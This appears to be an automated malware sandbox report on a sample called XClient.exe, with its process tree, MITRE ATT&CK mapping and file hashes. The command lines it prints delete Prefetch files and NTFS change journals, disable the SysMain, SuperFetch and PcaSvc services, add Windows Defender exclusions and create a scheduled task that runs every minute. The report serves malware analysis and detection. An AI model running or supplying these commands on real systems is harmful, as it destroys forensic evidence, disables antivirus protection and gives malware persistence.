C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:4540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5176
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:6072
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:1280
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4304
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:948
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:5504
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:1032
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5452
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5492
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5744
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5252
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5952
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4960
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:6004
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:5160
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:5544
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:1776
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:1144
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:4984
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:2412
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4864
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:5604
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4496
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4768
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:6072
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:6092
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5156
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5348
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5260
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:1412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:3844
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5904
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5972
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:5996
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:3608
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:2384
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5924
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:4640
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5160
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5508
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:4328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1216
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5204
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:848
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5304
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:4740
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:2184
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:5512
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5280
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5176
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:6064
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2996
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:696
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5656
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5476
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:5676
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:5616
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:4684
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:5844
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:3888
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:3468
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4464
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:316
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4972
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:2752
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:2424
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:6060
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:2924
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:2840
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:392
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:1480
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:4736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4732
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5752
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5688
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4064
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:4260
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:5312
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:1908
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5564
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:3580
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:1896
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4004
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:2928
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4368
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:1296
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:2088
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:2024
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:4652
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:6040
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:2036
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:6008
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5660
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:4316
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
PID:5704
-
-
-
C:\ProgramData\XClient.exe"C:\ProgramData\XClient.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"3⤵
- Creates scheduled task(s)
PID:2904
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s w32time1⤵
- Suspicious use of AdjustPrivilegeToken
PID:392
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s w32time1⤵
- Suspicious use of AdjustPrivilegeToken
PID:324
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:388
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:656
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4764
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
PID:4088
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Modify Registry
2Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16.6MB
MD52168b2eff6aa08948aa8bec7304a3358
SHA1b19f9edd3fa9a53a687120f778ce6b9bfd6c0ac1
SHA256cbc18abc563c1fe2d1a71c7bc2350807c62ecffdb02b11f1a34946b0777bd677
SHA51276f1963825df8b9cc7427127357216ce27a0e61f4b8500f7b2f6e65093fd98e7cdd7289a6867f223e23f2cedd10ae52ba72ccb21075c2eee70efeaca50f4f04b
-
Filesize
59KB
MD5373a87e2d6e4f2d5b6b530bece8ceb67
SHA117b5e6fdc6a6a797e5833ccb8c0d8aebae96d60f
SHA2561d6dd855bb196a7b983bd151fda3c0a302ebad418395b737cdf300de40c08a31
SHA5120d99eb06b36a73124ccffe9e5251dbba71b905c5eb3b2d38492512d4b6327845017eb0cdc30273d917556f701cd37f26385936bee4feaa0982b89fa4541ad5c0
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
152B
MD5a9e55f5864d6e2afd2fd84e25a3bc228
SHA1a5efcff9e3df6252c7fe8535d505235f82aab276
SHA2560f4df3120e4620555916be8e51c29be8d600d68ae5244efad6a0268aabc8c452
SHA51212f45fa73a6de6dfe17acc8b52b60f2d79008da130730b74cc138c1dcd73ccc99487165e3c8c90dc247359fde272f1ec6b3cf2c5fcb04e5093936144d0558b75
-
Filesize
152B
MD5dbac49e66219979194c79f1cf1cb3dd1
SHA14ef87804a04d51ae1fac358f92382548b27f62f2
SHA256f24ed6c5bf4b734a9af4d64e14a80a160bea569f50849f70bf7b7277c4f48562
SHA512bb314d61f53cf7774f6dfb6b772c72f5daf386bc3d27d2bb7a14c65848ee86e6c48e9c5696693ded31846b69b9372a530175df48494e3d61a228e49d43401ad1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize240B
MD5f52ee013cf6924827295ff16be8f7cea
SHA1fd0b14bb71b21159286e5b5bfc36b3d99b0d69ef
SHA256e245ba59e6ecb97a6d09970d02c6617d3bbb8dbbd4e69a1b83783cf701d20541
SHA5123c26552bcfedcb7c712f7f6a51921040bc086f3c34ebb8a62dc43daaa4bf363446015a1dbcaa31747b21744f71e56ec12998cd8a986df890c88ee712a06a96fd
-
Filesize
1KB
MD50b1a3dab3202b1d8654870cd9bf925c6
SHA1fefbc47531f850a55bc0c80ba9d8f4637ca5b895
SHA256b2a1aa648a531af0aec6bbfbceae8b48d65ff7dc75be290d6fb97e0aa2538dc2
SHA5122b8915bf4988449f53b3b5a693ba5ab93320e09da5a6da3ae972b6d6cae06ff87f700d16098d0b3440ab1ec8875cb3dfae23bbf181952cb5ba577cf49dc76e8c
-
Filesize
7KB
MD56c857a7303736b9caed3bc45ad1595c1
SHA1874538df9038445366913682192137967882d711
SHA2569f55fc18ffcf3493ec69562639975511f83d160e9ceecb11e2088e20ebe642d3
SHA5122dfad29acbb63367e00cf2a71635c10a50790ccabe1cfbe373ca2505c34943eca884db9d48056610f1d2fb18ba1ba84d1ca393ecbc29e75a78b12a0c73d60ebb
-
Filesize
5KB
MD5731358c6b74adf49d9b588c467792f7d
SHA12dd3dcc898702b40cc57d93d9c80f0cab7eaa5be
SHA2564406e0d52fef23ba1a428b29fcd89c52d32a18604ceb820752d13be67b05355d
SHA512f21f2483f73d277934dde0e0e38fbfccd6ffd1aba6d7eee46048f282683c32e98897db5ecf827080c27d79450965e8f72480fa2c75dcb519a98f254a95f9f0b3
-
Filesize
11KB
MD56beda1798aaa7ed8e7e04f85a01e224d
SHA181e163b7c5110ed442c879d02e370081c3dde185
SHA256fb1605388d985613b9be8503e7d86e00eadb90f6522b78e5a3c03a81042e95bb
SHA512db762b7b5d010d4b8d22c14a157d3893f14df6a703d8d054188e93d6b192043d8b037b68bbc3c137d0a5cad0ca3229ae4284b90ae34e953d9c926a0c6698188d
-
Filesize
1020B
MD5364c89e226c55448b9078c9de021bb81
SHA1038c9869b98637713fc06ed24b89ebf8e8b9a514
SHA256f32f7c79e35d7637df1eb1662911ddaf980c59de103416d3da145671901b22e2
SHA512b3db8bc19945e6ac9c473fd4b0bb90da8241e6d6dc0ce6186567639f42c3319663087e7452e52ea243588d3320a074b0379bc8df48e116a75182cc75a836e447
-
Filesize
944B
MD52ea91e7d1b473f8290ae52d13e105194
SHA15e565d99a7733250427e70f5f6e1951a081deed6
SHA256712db2b991a3c11ccd71b36cfe99fad0b5b1eb1026b12d28c35a43334128671a
SHA5120d6e2f0f8963986cb27a5cb853c5a87af5d2b65142ff082b4a12681b467d4a72efbcaea71307513523915aa4f27e7b238c67f4ab563f69525938f38253599424
-
Filesize
64B
MD5115a62a09c5e39743a3690445719af73
SHA198e8d72fca15ee667624b11f0789bfcbd9efeba6
SHA256cec35d870692683c1ce1a89be8ef919ccc2773e78e42b1d789e9d796a261d921
SHA5129a56a5f8ccc89dbcc08e706e7173a2baabd43fabc7ba82c7ee5a5eee9b097cc3bf16b28cc5d2aa8c75d0a33b8b638420e2b5bbba0c352f30c02217db2a57d588
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
64B
MD517f4d5ecc1e1842edb8c17a16fd53f94
SHA17efa50bc8d794a8fb001adadf00bd39791142d22
SHA256add39b4f1b10813294ee6bfb45143828c29d7188049c39000cd498d57f151729
SHA5128c044cac1acbce647e84dd1ca31b1672ed5611208316d85f7c9544f1cc8b7c05fb7b989ab3286559b28bd61cd5a17ba1f4a07f5e9c0b2c25726f149ef88437d3
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD526403455115fbc3da2573a37cc28744a
SHA16a9bf407036a8b9d36313462c0257f53b4ee9170
SHA256222a7adb94c5e82df6466a4afce283e905c69f7feb18b3e34583b5cbbd88b352
SHA512be96d478e5d804b8daf805ad28d5eba644fb63a59a799273e029c8047a036f8aac74098efcadee0e4f405dcd1c0a689a1e8eb23f51a93634ed44f5a7c821beb6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD58f4ca63a233105afd51caf19a529d5d1
SHA14091e86822c40882481529f6435dbc1fe3427380
SHA256c1a6ebc447284aa643d01078d668d345232f0f1c5e8ec464d61ce5507a700499
SHA512534e093771738e4e1f890af131a157ff0ce3d6a0eb9b7e26439654b7f0f8d50c1969d546771c885f24369870c5790af73e85843025ef56b3c4b1a18d264c12a6